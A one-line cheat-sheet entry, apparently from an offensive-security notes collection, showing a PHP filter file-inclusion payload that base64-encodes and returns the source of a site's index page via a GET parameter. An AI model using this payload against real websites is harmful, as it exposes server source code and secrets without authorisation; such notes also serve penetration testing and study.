killchain-compendium/Exploits/Web/PHP Base64 Filter.md

7 lines
158 B
Markdown
Raw Normal View History

2022-11-13 22:52:30 +01:00
# PHP Filter
* Include into GET query, and get index page, for example
```sh
<URL>/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
```